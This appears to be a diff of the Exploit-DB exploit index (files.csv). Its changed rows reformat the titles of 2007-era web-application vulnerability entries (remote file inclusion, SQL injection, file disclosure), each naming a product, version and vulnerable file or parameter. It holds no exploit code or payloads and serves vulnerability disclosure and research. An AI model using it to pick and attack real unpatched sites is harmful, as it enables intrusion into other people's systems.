Path 1.0 - (vp/configure.php) Remote File Inclusion",2007-01-25,GoLd_M,php,webapps,0 -3201,platforms/php/webapps/3201.txt,"MyPHPcommander 2.0 - (package.php) Remote File Inclusion",2007-01-26,"Cold Zero",php,webapps,0 -3202,platforms/php/webapps/3202.txt,"AINS 0.02b - (ains_main.php ains_path) Remote File Inclusion",2007-01-26,"ThE dE@Th",php,webapps,0 +3198,platforms/php/webapps/3198.txt,"Virtual Path 1.0 - 'vp/configure.php' Remote File Inclusion",2007-01-25,GoLd_M,php,webapps,0 +3201,platforms/php/webapps/3201.txt,"MyPHPcommander 2.0 - 'package.php' Remote File Inclusion",2007-01-26,"Cold Zero",php,webapps,0 +3202,platforms/php/webapps/3202.txt,"AINS 0.02b - 'ains_main.php ains_path' Remote File Inclusion",2007-01-26,"ThE dE@Th",php,webapps,0 3203,platforms/php/webapps/3203.txt,"FD Script 1.3.2 - 'download.php' Remote File Disclosure",2007-01-26,ajann,php,webapps,0 -3205,platforms/php/webapps/3205.txt,"nsGalPHP - (includes/config.inc.php racineTBS) Remote File Inclusion",2007-01-27,S.W.A.T.,php,webapps,0 +3205,platforms/php/webapps/3205.txt,"nsGalPHP - 'includes/config.inc.php racineTBS' Remote File Inclusion",2007-01-27,S.W.A.T.,php,webapps,0 3206,platforms/php/webapps/3206.txt,"ACGVclick 0.2.0 - 'path' Remote File Inclusion",2007-01-27,ajann,php,webapps,0 3207,platforms/php/webapps/3207.pl,"Drunken:Golem Portal 0.5.1 Alpha 2 - Remote File Inclusion",2007-01-27,MackRulZ,php,webapps,0 3208,platforms/php/webapps/3208.txt,"ACGVannu 1.3 - 'index2.php' Remote User Pass Change",2007-01-27,ajann,php,webapps,0 3209,platforms/php/webapps/3209.txt,"Xt-Stats 2.4.0.b3 (server_base_dir) - Remote File Inclusion",2007-01-27,"ThE dE@Th",php,webapps,0 3210,platforms/asp/webapps/3210.txt,"chernobiLe Portal 1.0 - 'default.asp' SQL Injection",2007-01-27,ajann,asp,webapps,0 -3212,platforms/php/webapps/3212.txt,"PHPMyReports 3.0.11 - (lib_head.php) Remote File Inclusion",2007-01-27,GoLd_M,php,webapps,0 +3212,platforms/php/webapps/3212.txt,"PHPMyReports 3.0.11 - 'lib_head.php' Remote File Inclusion",2007-01-27,GoLd_M,php,webapps,0 3214,platforms/php/webapps/3214.pl,"EclipseBB 0.5.0 Lite - 'phpbb_root_path' Remote File Inclusion",2007-01-28,"Mehmet Ince",php,webapps,0 3215,platforms/php/webapps/3215.pl,"Foro Domus 2.10 - 'phpbb_root_path' Remote File Inclusion",2007-01-28,"Mehmet Ince",php,webapps,0 -3216,platforms/php/webapps/3216.txt,"xNews 1.3 - (xNews.php) SQL Injection",2007-01-28,ajann,php,webapps,0 +3216,platforms/php/webapps/3216.txt,"xNews 1.3 - 'xNews.php' SQL Injection",2007-01-28,ajann,php,webapps,0 3217,platforms/php/webapps/3217.txt,"PHP Generic library & Framework - 'INCLUDE_PATH' Remote File Inclusion",2007-01-28,"Mehmet Ince",php,webapps,0 3221,platforms/php/webapps/3221.php,"GuppY 4.5.16 - Remote Commands Execution Exploit",2007-01-29,rgod,php,webapps,0 -3222,platforms/php/webapps/3222.txt,"Webfwlog 0.92 - (debug.php) Remote File Disclosure",2007-01-29,GoLd_M,php,webapps,0 -3225,platforms/php/webapps/3225.pl,"Galeria Zdjec 3.0 - (zd_numer.php) Local File Inclusion",2007-01-30,ajann,php,webapps,0 +3222,platforms/php/webapps/3222.txt,"Webfwlog 0.92 - 'debug.php' Remote File Disclosure",2007-01-29,GoLd_M,php,webapps,0 +3225,platforms/php/webapps/3225.pl,"Galeria Zdjec 3.0 - 'zd_numer.php' Local File Inclusion",2007-01-30,ajann,php,webapps,0 3226,platforms/php/webapps/3226.txt,"PHPFootball 1.6 - Remote Database Disclosure",2007-01-30,ajann,php,webapps,0 3227,platforms/php/webapps/3227.txt,"CascadianFAQ 4.1 - 'index.php' SQL Injection",2007-01-30,ajann,php,webapps,0 -3228,platforms/php/webapps/3228.txt,"MyNews 4.2.2 - (themefunc.php) Remote File Inclusion",2007-01-30,GoLd_M,php,webapps,0 +3228,platforms/php/webapps/3228.txt,"MyNews 4.2.2 - 'themefunc.php' Remote File Inclusion",2007-01-30,GoLd_M,php,webapps,0 3231,platforms/php/webapps/3231.txt,"PHPBB2 MODificat 0.2.0 - 'functions.php' Remote File Inclusion",2007-01-30,"Mehmet Ince",php,webapps,0 3232,platforms/php/webapps/3232.txt,"Michelles L2J Dropcalc 4 - SQL Injection",2007-01-31,Codebreak,php,webapps,0 3233,platforms/asp/webapps/3233.txt,"Fullaspsite Asp Hosting Sitesi - (tr) SQL Injection",2007-01-31,cl24zy,asp,webapps,0 @@ -17278,44 +17281,44 @@ id,file,description,date,author,platform,type,port 3241,platforms/asp/webapps/3241.txt,"Hunkaray Duyuru Scripti - (tr) SQL Injection",2007-01-31,cl24zy,asp,webapps,0 3242,platforms/php/webapps/3242.txt,"Omegaboard 1.0beta4 - 'functions.php' Remote File Inclusion",2007-01-31,"Mehmet Ince",php,webapps,0 3243,platforms/php/webapps/3243.txt,"Cerulean Portal System 0.7b - Remote File Inclusion",2007-01-31,"Mehmet Ince",php,webapps,0 -3245,platforms/php/webapps/3245.txt,"SIPS 0.3.1 - (box.inc.php) Remote File Inclusion",2007-02-01,ajann,php,webapps,0 +3245,platforms/php/webapps/3245.txt,"SIPS 0.3.1 - 'box.inc.php' Remote File Inclusion",2007-02-01,ajann,php,webapps,0 3246,platforms/php/webapps/3246.txt,"phpEventMan 1.0.2 - (level) Remote File Inclusion",2007-02-01,"Mehmet Ince",php,webapps,0 -3247,platforms/php/webapps/3247.txt,"Epistemon 1.0 - (common.php inc_path) Remote File Inclusion",2007-02-01,GoLd_M,php,webapps,0 -3249,platforms/php/webapps/3249.txt,"WebBuilder 2.0 - (StageLoader.php) Remote File Inclusion",2007-02-01,GoLd_M,php,webapps,0 +3247,platforms/php/webapps/3247.txt,"Epistemon 1.0 - 'common.php inc_path' Remote File Inclusion",2007-02-01,GoLd_M,php,webapps,0 +3249,platforms/php/webapps/3249.txt,"WebBuilder 2.0 - 'StageLoader.php' Remote File Inclusion",2007-02-01,GoLd_M,php,webapps,0 3250,platforms/php/webapps/3250.txt,"Portail Web PHP 2.5.1 - 'includes.php' Remote File Inclusion",2007-02-01,"laurent gaffié",php,webapps,0 3251,platforms/php/webapps/3251.txt,"CoD2: DreamStats 4.2 - 'index.php' Remote File Inclusion",2007-02-02,"ThE dE@Th",php,webapps,0 3252,platforms/php/webapps/3252.txt,"EQdkp 1.3.1 - 'Referer Spoof' Remote Database Backup",2007-02-02,Eight10,php,webapps,0 -3253,platforms/php/webapps/3253.txt,"Flipper Poll 1.1.0 - (poll.php root_path) Remote File Inclusion",2007-02-02,"Mehmet Ince",php,webapps,0 +3253,platforms/php/webapps/3253.txt,"Flipper Poll 1.1.0 - 'poll.php root_path' Remote File Inclusion",2007-02-02,"Mehmet Ince",php,webapps,0 3255,platforms/php/webapps/3255.php,"F3Site 2.1 - Remote Code Execution",2007-02-02,Kacper,php,webapps,0 3256,platforms/php/webapps/3256.txt,"dB Masters Curium CMS 1.03 - (c_id) SQL Injection",2007-02-02,ajann,php,webapps,0 3258,platforms/php/webapps/3258.txt,"phpBB ezBoard Converter 0.2 - (ezconvert_dir) Remote File Inclusion",2007-02-02,"Mehmet Ince",php,webapps,0 3259,platforms/php/webapps/3259.pl,"phpBB++ Build 100 - 'phpbb_root_path' Remote File Inclusion",2007-02-02,"Mehmet Ince",php,webapps,0 -3261,platforms/php/webapps/3261.txt,"Photo Galerie Standard 1.1 - (view.php) SQL Injection",2007-02-03,ajann,php,webapps,0 -3262,platforms/php/webapps/3262.php,"Woltlab Burning Board Lite 1.0.2pl3e - (pms.php) SQL Injection",2007-02-03,rgod,php,webapps,0 -3263,platforms/php/webapps/3263.txt,"KDPics 1.11 - (exif.php lib_path) Remote File Inclusion",2007-02-03,AsTrex,php,webapps,0 -3266,platforms/php/webapps/3266.txt,"Flip 2.01 final - (previewtheme.php inc_path) Remote File Inclusion",2007-02-04,GoLd_M,php,webapps,0 +3261,platforms/php/webapps/3261.txt,"Photo Galerie Standard 1.1 - 'view.php' SQL Injection",2007-02-03,ajann,php,webapps,0 +3262,platforms/php/webapps/3262.php,"Woltlab Burning Board Lite 1.0.2pl3e - 'pms.php' SQL Injection",2007-02-03,rgod,php,webapps,0 +3263,platforms/php/webapps/3263.txt,"KDPics 1.11 - 'exif.php lib_path' Remote File Inclusion",2007-02-03,AsTrex,php,webapps,0 +3266,platforms/php/webapps/3266.txt,"Flip 2.01 final - 'previewtheme.php inc_path' Remote File Inclusion",2007-02-04,GoLd_M,php,webapps,0 3267,platforms/php/webapps/3267.txt,"Geeklog 2 - 'BaseView.php' Remote File Inclusion",2007-02-05,GoLd_M,php,webapps,0 -3268,platforms/php/webapps/3268.txt,"SMA-DB 0.3.9 - (settings.php) Remote File Inclusion",2007-02-05,"ThE dE@Th",php,webapps,0 +3268,platforms/php/webapps/3268.txt,"SMA-DB 0.3.9 - 'settings.php' Remote File Inclusion",2007-02-05,"ThE dE@Th",php,webapps,0 3270,platforms/php/webapps/3270.pl,"Categories hierarchy phpBB Mod 2.1.2 - 'phpbb_root_path' Remote File Inclusion",2007-02-05,"Mehmet Ince",php,webapps,0 3271,platforms/php/webapps/3271.php,"GGCMS 1.1.0 RC1 - Remote Code Execution",2007-02-05,Kacper,php,webapps,0 -3275,platforms/php/webapps/3275.txt,"LightRO CMS 1.0 - (inhalt.php) Remote File Inclusion",2007-02-06,ajann,php,webapps,0 +3275,platforms/php/webapps/3275.txt,"LightRO CMS 1.0 - 'inhalt.php' Remote File Inclusion",2007-02-06,ajann,php,webapps,0 3278,platforms/php/webapps/3278.txt,"Kisisel Site 2007 - (tr) SQL Injection",2007-02-06,cl24zy,php,webapps,0 -3280,platforms/php/webapps/3280.txt,"AgerMenu 0.01 - (top.inc.php rootdir) Remote File Inclusion",2007-02-07,GoLd_M,php,webapps,0 -3281,platforms/php/webapps/3281.txt,"WebMatic 2.6 - (index_album.php) Remote File Inclusion",2007-02-07,MadNet,php,webapps,0 +3280,platforms/php/webapps/3280.txt,"AgerMenu 0.01 - 'top.inc.php rootdir' Remote File Inclusion",2007-02-07,GoLd_M,php,webapps,0 +3281,platforms/php/webapps/3281.txt,"WebMatic 2.6 - 'index_album.php' Remote File Inclusion",2007-02-07,MadNet,php,webapps,0 3282,platforms/php/webapps/3282.pl,"Advanced Poll 2.0.5-dev - Remote Admin Session Generator Exploit",2007-02-07,diwou,php,webapps,0 3283,platforms/php/webapps/3283.txt,"otscms 2.1.5 - SQL Injection / Cross-Site Scripting",2007-02-07,GregStar,php,webapps,0 3284,platforms/php/webapps/3284.txt,"Maian Recipe 1.0 - 'path_to_folder' Parameter Remote File Inclusion",2007-02-07,Denven,php,webapps,0 3285,platforms/php/webapps/3285.htm,"Site-Assistant 0990 - (paths[version]) Remote File Inclusion",2007-02-08,ajann,php,webapps,0 -3286,platforms/php/webapps/3286.asp,"LightRO CMS 1.0 - (index.php projectid) SQL Injection",2007-02-08,ajann,php,webapps,0 +3286,platforms/php/webapps/3286.asp,"LightRO CMS 1.0 - 'index.php projectid' SQL Injection",2007-02-08,ajann,php,webapps,0 3287,platforms/php/webapps/3287.asp,"LushiNews 1.01 - 'comments.php' SQL Injection",2007-02-08,ajann,php,webapps,0 -3288,platforms/php/webapps/3288.asp,"LushiWarPlaner 1.0 - (register.php) SQL Injection",2007-02-08,ajann,php,webapps,0 +3288,platforms/php/webapps/3288.asp,"LushiWarPlaner 1.0 - 'register.php' SQL Injection",2007-02-08,ajann,php,webapps,0 3292,platforms/php/webapps/3292.txt,"OPENi-CMS Site Protection Plugin - Remote File Inclusion",2007-02-11,y3dips,php,webapps,0 -3295,platforms/asp/webapps/3295.txt,"philboard 1.14 - (philboard_forum.asp) SQL Injection",2007-02-12,"Mehmet Ince",asp,webapps,0 +3295,platforms/asp/webapps/3295.txt,"philboard 1.14 - 'philboard_forum.asp' SQL Injection",2007-02-12,"Mehmet Ince",asp,webapps,0 3297,platforms/php/webapps/3297.htm,"AT Contenator 1.0 - (Root_To_Script) Remote File Inclusion",2007-02-13,ajann,php,webapps,0 -3298,platforms/php/webapps/3298.pl,"Xaran CMS 2.0 - (xarancms_haupt.php) SQL Injection",2007-02-13,ajann,php,webapps,0 -3299,platforms/php/webapps/3299.pl,"PHPCC 4.2 Beta - (nickpage.php npid) SQL Injection",2007-02-13,ajann,php,webapps,0 +3298,platforms/php/webapps/3298.pl,"Xaran CMS 2.0 - 'xarancms_haupt.php' SQL Injection",2007-02-13,ajann,php,webapps,0 +3299,platforms/php/webapps/3299.pl,"PHPCC 4.2 Beta - 'nickpage.php npid' SQL Injection",2007-02-13,ajann,php,webapps,0 3300,platforms/php/webapps/3300.pl,"Advanced Poll 2.0.5-dev - Remote Code Execution",2007-02-13,diwou,php,webapps,0 -3301,platforms/asp/webapps/3301.txt,"PollMentor 2.0 - (pollmentorres.asp id) SQL Injection",2007-02-13,SaO,asp,webapps,0 +3301,platforms/asp/webapps/3301.txt,"PollMentor 2.0 - 'pollmentorres.asp id' SQL Injection",2007-02-13,SaO,asp,webapps,0 3305,platforms/php/webapps/3305.txt,"nabopoll 1.2 - Remote Unprotected Admin Section",2007-02-13,sn0oPy,php,webapps,0 3309,platforms/php/webapps/3309.txt,"Jupiter CMS 1.1.5 - 'index.php' Remote / Local File Inclusion",2007-02-14,DarkFig,php,webapps,0 3310,platforms/php/webapps/3310.php,"Jupiter CMS 1.1.5 - (Client-IP) SQL Injection",2007-02-14,DarkFig,php,webapps,0 @@ -17323,10 +17326,10 @@ id,file,description,date,author,platform,type,port 3312,platforms/php/webapps/3312.pl,"Drupal < 5.1 - (Post Comments) Remote Command Execution",2007-02-15,str0ke,php,webapps,0 3313,platforms/php/webapps/3313.pl,"Drupal < 4.7.6 - (Post Comments) Remote Command Execution",2007-02-15,str0ke,php,webapps,0 3314,platforms/php/webapps/3314.txt,"ZebraFeeds 1.0 - 'zf_path' Remote File Inclusion",2007-02-15,"ThE dE@Th",php,webapps,0 -3315,platforms/php/webapps/3315.txt,"nabopoll 1.2 - (survey.inc.php path) Remote File Inclusion",2007-02-15,Cr@zy_King,php,webapps,0 +3315,platforms/php/webapps/3315.txt,"nabopoll 1.2 - 'survey.inc.php path' Remote File Inclusion",2007-02-15,Cr@zy_King,php,webapps,0 3317,platforms/asp/webapps/3317.txt,"CodeAvalanche News 1.x - (CAT_ID) SQL Injection",2007-02-15,beks,asp,webapps,0 3318,platforms/asp/webapps/3318.txt,"Aktueldownload Haber scripti - 'id' SQL Injection",2007-02-15,"Mehmet Ince",asp,webapps,0 -3321,platforms/asp/webapps/3321.txt,"Snitz Forums 2000 3.1 SR4 - (pop_profile.asp) SQL Injection",2007-02-16,"Mehmet Ince",asp,webapps,0 +3321,platforms/asp/webapps/3321.txt,"Snitz Forums 2000 3.1 SR4 - 'pop_profile.asp' SQL Injection",2007-02-16,"Mehmet Ince",asp,webapps,0 3322,platforms/php/webapps/3322.htm,"VS-News-System 1.2.1 - (newsordner) Remote File Inclusion",2007-02-16,ajann,php,webapps,0 3323,platforms/php/webapps/3323.htm,"VS-Link-Partner 2.1 - (script_pfad) Remote File Inclusion",2007-02-16,ajann,php,webapps,0 3324,platforms/php/webapps/3324.txt,"Htaccess Passwort Generator 1.1 - (ht_pfad) Remote File Inclusion",2007-02-16,kezzap66345,php,webapps,0 @@ -17334,11 +17337,11 @@ id,file,description,date,author,platform,type,port 3326,platforms/php/webapps/3326.txt,"Vivvo Article Manager 3.4 - (root) Local File Inclusion",2007-02-16,Snip0r,php,webapps,0 3327,platforms/php/webapps/3327.txt,"XLAtunes 0.1 - (album) SQL Injection",2007-02-17,Bl0od3r,php,webapps,0 3328,platforms/php/webapps/3328.htm,"S-Gastebuch 1.5.3 - (gb_pfad) Remote File Inclusion",2007-02-18,ajann,php,webapps,0 -3332,platforms/php/webapps/3332.pl,"Xpression News 1.0.1 - (archives.php) Remote File Disclosure",2007-02-18,r0ut3r,php,webapps,0 +3332,platforms/php/webapps/3332.pl,"Xpression News 1.0.1 - 'archives.php' Remote File Disclosure",2007-02-18,r0ut3r,php,webapps,0 3334,platforms/php/webapps/3334.asp,"PHP-Nuke Module Emporium 2.3.0 - SQL Injection",2007-02-19,ajann,php,webapps,0 -3336,platforms/php/webapps/3336.txt,"Ultimate Fun Book 1.02 - (function.php) Remote File Inclusion",2007-02-20,kezzap66345,php,webapps,0 -3337,platforms/php/webapps/3337.php,"NukeSentinel 2.5.05 - (nsbypass.php) Blind SQL Injection",2007-02-20,DarkFig,php,webapps,0 -3338,platforms/php/webapps/3338.php,"NukeSentinel 2.5.05 - (nukesentinel.php) File Disclosure",2007-02-20,DarkFig,php,webapps,0 +3336,platforms/php/webapps/3336.txt,"Ultimate Fun Book 1.02 - 'function.php' Remote File Inclusion",2007-02-20,kezzap66345,php,webapps,0 +3337,platforms/php/webapps/3337.php,"NukeSentinel 2.5.05 - 'nsbypass.php' Blind SQL Injection",2007-02-20,DarkFig,php,webapps,0 +3338,platforms/php/webapps/3338.php,"NukeSentinel 2.5.05 - 'nukesentinel.php' File Disclosure",2007-02-20,DarkFig,php,webapps,0 3339,platforms/asp/webapps/3339.txt,"Online Web Building 2.0 - 'id' SQL Injection",2007-02-20,"Mehmet Ince",asp,webapps,0 3344,platforms/php/webapps/3344.pl,"PHP-Nuke 8.0 Final - (INSERT) Blind SQL Injection (MySQL)",2007-02-20,krasza,php,webapps,0 3345,platforms/php/webapps/3345.pl,"PHP-Nuke 8.0 Final - (INSERT) SQL Injection",2007-02-20,krasza,php,webapps,0 @@ -17348,49 +17351,49 @@ id,file,description,date,author,platform,type,port 3352,platforms/php/webapps/3352.php,"Connectix Boards 0.7 - 'p_skin' Multiple Vulnerabilities",2007-02-21,DarkFig,php,webapps,0 3353,platforms/php/webapps/3353.txt,"DBImageGallery 1.2.2 - (donsimg_base_path) Remote File Inclusion",2007-02-21,Denven,php,webapps,0 3354,platforms/php/webapps/3354.txt,"DBGuestbook 1.1 - (dbs_base_path) Remote File Inclusion",2007-02-21,Denven,php,webapps,0 -3355,platforms/php/webapps/3355.php,"Nabopoll 1.2 - (result.php surv) Blind SQL Injection",2007-02-21,s0cratex,php,webapps,0 +3355,platforms/php/webapps/3355.php,"Nabopoll 1.2 - 'result.php surv' Blind SQL Injection",2007-02-21,s0cratex,php,webapps,0 3357,platforms/php/webapps/3357.txt,"DZCP (deV!L_z Clanportal) 1.4.5 - Remote File Disclosure",2007-02-21,Kiba,php,webapps,0 -3360,platforms/php/webapps/3360.txt,"FlashGameScript 1.5.4 - (index.php func) Remote File Inclusion",2007-02-22,JuMp-Er,php,webapps,0 +3360,platforms/php/webapps/3360.txt,"FlashGameScript 1.5.4 - 'index.php func' Remote File Inclusion",2007-02-22,JuMp-Er,php,webapps,0 3361,platforms/php/webapps/3361.txt,"eFiction 3.1.1 - 'path_to_smf' Remote File Inclusion",2007-02-22,"ThE dE@Th",php,webapps,0 -3365,platforms/php/webapps/3365.txt,"FCRing 1.31 - (fcring.php s_fuss) Remote File Inclusion",2007-02-23,kezzap66345,php,webapps,0 -3366,platforms/php/webapps/3366.txt,"Sinapis 2.2 Gastebuch - (sinagb.php fuss) Remote File Inclusion",2007-02-23,kezzap66345,php,webapps,0 -3367,platforms/php/webapps/3367.txt,"Sinapis Forum 2.2 - (sinapis.php fuss) Remote File Inclusion",2007-02-23,kezzap66345,php,webapps,0 +3365,platforms/php/webapps/3365.txt,"FCRing 1.31 - 'fcring.php s_fuss' Remote File Inclusion",2007-02-23,kezzap66345,php,webapps,0 +3366,platforms/php/webapps/3366.txt,"Sinapis 2.2 Gastebuch - 'sinagb.php fuss' Remote File Inclusion",2007-02-23,kezzap66345,php,webapps,0 +3367,platforms/php/webapps/3367.txt,"Sinapis Forum 2.2 - 'sinapis.php fuss' Remote File Inclusion",2007-02-23,kezzap66345,php,webapps,0 3370,platforms/php/webapps/3370.pl,"Extreme phpBB 3.0.1 - 'functions.php' Remote File Inclusion",2007-02-24,"Mehmet Ince",php,webapps,0 3371,platforms/php/webapps/3371.php,"Coppermine Photo Gallery 1.3.x - Blind SQL Injection",2007-02-24,s0cratex,php,webapps,0 -3372,platforms/php/webapps/3372.php,"CS-Gallery 2.0 - (index.php album) Remote File Inclusion",2007-02-24,burncycle,php,webapps,0 +3372,platforms/php/webapps/3372.php,"CS-Gallery 2.0 - 'index.php album' Remote File Inclusion",2007-02-24,burncycle,php,webapps,0 3373,platforms/php/webapps/3373.pl,"phpBB Module NoMoKeTos Rules 0.0.1 - Remote File Inclusion",2007-02-24,bd0rk,php,webapps,0 -3374,platforms/php/webapps/3374.txt,"PHP-MIP 0.1 - (top.php laypath) Remote File Inclusion",2007-02-25,GoLd_M,php,webapps,0 -3379,platforms/php/webapps/3379.php,"STWC-Counter 3.4.0 - (downloadcounter.php) Remote File Inclusion",2007-02-26,burncycle,php,webapps,0 -3382,platforms/php/webapps/3382.txt,"Admin Phorum 3.3.1a - (del.php include_path) Remote File Inclusion",2007-02-27,GoLd_M,php,webapps,0 -3387,platforms/php/webapps/3387.php,"vBulletin 3.6.4 - (inlinemod.php postids) SQL Injection",2007-02-28,rgod,php,webapps,0 -3390,platforms/asp/webapps/3390.txt,"Angel Lms 7.1 - (default.asp id) SQL Injection",2007-03-01,"Craig Heffner",asp,webapps,0 +3374,platforms/php/webapps/3374.txt,"PHP-MIP 0.1 - 'top.php laypath' Remote File Inclusion",2007-02-25,GoLd_M,php,webapps,0 +3379,platforms/php/webapps/3379.php,"STWC-Counter 3.4.0 - 'downloadcounter.php' Remote File Inclusion",2007-02-26,burncycle,php,webapps,0 +3382,platforms/php/webapps/3382.txt,"Admin Phorum 3.3.1a - 'del.php include_path' Remote File Inclusion",2007-02-27,GoLd_M,php,webapps,0 +3387,platforms/php/webapps/3387.php,"vBulletin 3.6.4 - 'inlinemod.php postids' SQL Injection",2007-02-28,rgod,php,webapps,0 +3390,platforms/asp/webapps/3390.txt,"Angel Lms 7.1 - 'default.asp id' SQL Injection",2007-03-01,"Craig Heffner",asp,webapps,0 3393,platforms/php/webapps/3393.php,"phpMyFAQ 1.6.7 - SQL Injection / Command Execution",2007-03-01,elgCrew,php,webapps,0 39567,platforms/php/webapps/39567.txt,"Monstra CMS 3.0.3 - Multiple Vulnerabilities",2016-03-16,"Sarim Kiani",php,webapps,80 3398,platforms/php/webapps/3398.txt,"Mani Stats Reader 1.2 - (ipath) Remote File Inclusion",2007-03-02,mozi,php,webapps,0 3400,platforms/php/webapps/3400.pl,"webSPELL 4.01.02 - Multiple SQL Injections",2007-03-02,DNX,php,webapps,0 3402,platforms/php/webapps/3402.php,"webSPELL 4.01.02 - Remote PHP Code Execution",2007-03-03,DarkFig,php,webapps,0 3403,platforms/php/webapps/3403.php,"Rigter Portal System (RPS) 6.2 - Blind SQL Injection",2007-03-04,s0cratex,php,webapps,0 -3406,platforms/php/webapps/3406.pl,"News-Letterman 1.1 - (eintrag.php sqllog) Remote File Inclusion",2007-03-04,bd0rk,php,webapps,0 +3406,platforms/php/webapps/3406.pl,"News-Letterman 1.1 - 'eintrag.php sqllog' Remote File Inclusion",2007-03-04,bd0rk,php,webapps,0 3408,platforms/php/webapps/3408.pl,"AJ Auction Pro - 'subcat.php' SQL Injection",2007-03-04,ajann,php,webapps,0 -3409,platforms/php/webapps/3409.htm,"AJ Dating 1.0 - (view_profile.php) SQL Injection",2007-03-04,ajann,php,webapps,0 +3409,platforms/php/webapps/3409.htm,"AJ Dating 1.0 - 'view_profile.php' SQL Injection",2007-03-04,ajann,php,webapps,0 3410,platforms/php/webapps/3410.htm,"AJ Classifieds 1.0 - 'postingdetails.php' SQL Injection",2007-03-04,ajann,php,webapps,0 -3411,platforms/php/webapps/3411.pl,"AJ Forum 1.0 - (topic_title.php) SQL Injection",2007-03-04,ajann,php,webapps,0 +3411,platforms/php/webapps/3411.pl,"AJ Forum 1.0 - 'topic_title.php' SQL Injection",2007-03-04,ajann,php,webapps,0 3412,platforms/cgi/webapps/3412.txt,"RRDBrowse 1.6 - Arbitrary File Disclosure",2007-03-04,"Sebastian Wolfgarten",cgi,webapps,0 3416,platforms/php/webapps/3416.pl,"Links Management Application 1.0 - (lcnt) SQL Injection",2007-03-05,ajann,php,webapps,0 3423,platforms/php/webapps/3423.txt,"PHP-Nuke Module PostGuestbook 0.6.1 - (tpl_pgb_moddir) Remote File Inclusion",2007-03-07,GoLd_M,php,webapps,0 -3428,platforms/php/webapps/3428.txt,"Flat Chat 2.0 - (include online.txt) Remote Code Execution",2007-03-07,Dj7xpl,php,webapps,0 -3435,platforms/php/webapps/3435.txt,"netForo! 0.1 - (down.php file_to_download) Remote File Disclosure",2007-03-08,GoLd_M,php,webapps,0 +3428,platforms/php/webapps/3428.txt,"Flat Chat 2.0 - 'include online.txt' Remote Code Execution",2007-03-07,Dj7xpl,php,webapps,0 +3435,platforms/php/webapps/3435.txt,"netForo! 0.1 - 'down.php file_to_download' Remote File Disclosure",2007-03-08,GoLd_M,php,webapps,0 3436,platforms/php/webapps/3436.txt,"WEBO (Web ORGanizer) 1.0 - 'baseDir' Remote File Inclusion",2007-03-08,K-159,php,webapps,0 3437,platforms/asp/webapps/3437.txt,"GaziYapBoz Game Portal - 'kategori.asp' SQL Injection",2007-03-08,CyberGhost,asp,webapps,0 -3438,platforms/php/webapps/3438.txt,"Magic CMS 4.2.747 - (mysave.php) Remote File Inclusion",2007-03-08,DNX,php,webapps,0 +3438,platforms/php/webapps/3438.txt,"Magic CMS 4.2.747 - 'mysave.php' Remote File Inclusion",2007-03-08,DNX,php,webapps,0 3443,platforms/php/webapps/3443.txt,"PMB Services 3.0.13 - Multiple Remote File Inclusion",2007-03-09,K-159,php,webapps,0 3447,platforms/php/webapps/3447.txt,"Grayscale Blog 0.8.0 - Security Bypass / SQL Injection / Cross-Site Scripting",2007-03-09,Omni,php,webapps,0 3448,platforms/php/webapps/3448.txt,"work system E-Commerce 3.0.5 - Remote File Inclusion",2007-03-10,"Rodrigo Duarte",php,webapps,0 -3449,platforms/php/webapps/3449.txt,"HC Newssystem 1.0-1.4 - (index.php ID) SQL Injection",2007-03-10,WiLdBoY,php,webapps,0 +3449,platforms/php/webapps/3449.txt,"HC Newssystem 1.0-1.4 - 'index.php ID' SQL Injection",2007-03-10,WiLdBoY,php,webapps,0 3450,platforms/php/webapps/3450.php,"NukeSentinel 2.5.06 - SQL Injection",2007-03-10,DarkFig,php,webapps,0 3454,platforms/php/webapps/3454.pl,"PostNuke Module phgstats 0.5 - (phgdir) Remote File Inclusion",2007-03-11,bd0rk,php,webapps,0 3455,platforms/php/webapps/3455.htm,"JobSitePro 1.0 - 'search.php' SQL Injection",2007-03-11,ajann,php,webapps,0 -3456,platforms/php/webapps/3456.pl,"Top Auction 1.0 - (viewcat.php) SQL Injection",2007-03-11,ajann,php,webapps,0 +3456,platforms/php/webapps/3456.pl,"Top Auction 1.0 - 'viewcat.php' SQL Injection",2007-03-11,ajann,php,webapps,0 3457,platforms/php/webapps/3457.pl,"SonicMailer Pro 3.2.3 - 'index.php' SQL Injection",2007-03-11,ajann,php,webapps,0 3458,platforms/php/webapps/3458.txt,"AssetMan 2.4a - 'download_pdf.php' Remote File Disclosure",2007-03-11,"BorN To K!LL",php,webapps,0 3459,platforms/php/webapps/3459.txt,"cPanel 10.9.x - 'Fantastico' Local File Inclusion",2007-03-11,"cyb3rt & 020",php,webapps,0 @@ -17398,8 +17401,8 @@ id,file,description,date,author,platform,type,port 3466,platforms/asp/webapps/3466.txt,"BP Blog 7.0 - 'layout' Parameter SQL Injection",2007-03-12,BeyazKurt,asp,webapps,0 3467,platforms/php/webapps/3467.txt,"GestArt Beta 1 - 'aide.php aide' Remote File Inclusion",2007-03-13,Dj7xpl,php,webapps,0 3468,platforms/php/webapps/3468.txt,"MySQL Commander 2.7 - (home) Remote File Inclusion",2007-03-13,K-159,php,webapps,0 -3469,platforms/asp/webapps/3469.txt,"X-ice News System 1.0 - (devami.asp id) SQL Injection",2007-03-13,CyberGhost,asp,webapps,0 -3470,platforms/asp/webapps/3470.htm,"JGBBS 3.0beta1 - (search.asp author) SQL Injection",2007-03-13,WiLdBoY,asp,webapps,0 +3469,platforms/asp/webapps/3469.txt,"X-ice News System 1.0 - 'devami.asp id' SQL Injection",2007-03-13,CyberGhost,asp,webapps,0 +3470,platforms/asp/webapps/3470.htm,"JGBBS 3.0beta1 - 'search.asp author' SQL Injection",2007-03-13,WiLdBoY,asp,webapps,0 3471,platforms/php/webapps/3471.txt,"Activist Mobilization Platform (AMP) 3.2 - Remote File Inclusion",2007-03-13,the_day,php,webapps,0 3472,platforms/php/webapps/3472.txt,"CARE2X 1.1 - 'ROOT_PATH' Remote File Inclusion",2007-03-13,the_day,php,webapps,0 3473,platforms/php/webapps/3473.txt,"WebCreator 0.2.6-rc3 - (moddir) Remote File Inclusion",2007-03-13,the_day,php,webapps,0 @@ -17407,7 +17410,7 @@ id,file,description,date,author,platform,type,port 3477,platforms/php/webapps/3477.htm,"WSN Guest 1.21 - 'id' Parameter SQL Injection",2007-03-14,WiLdBoY,php,webapps,0 3478,platforms/php/webapps/3478.htm,"Dayfox Blog 4 - 'postpost.php' Remote Code Execution",2007-03-14,Dj7xpl,php,webapps,0 3481,platforms/asp/webapps/3481.htm,"Orion-Blog 2.0 - Remote Authentication Bypass",2007-03-15,WiLdBoY,asp,webapps,0 -3483,platforms/php/webapps/3483.pl,"Woltlab Burning Board 2.x - (usergroups.php) SQL Injection",2007-03-15,x666,php,webapps,0 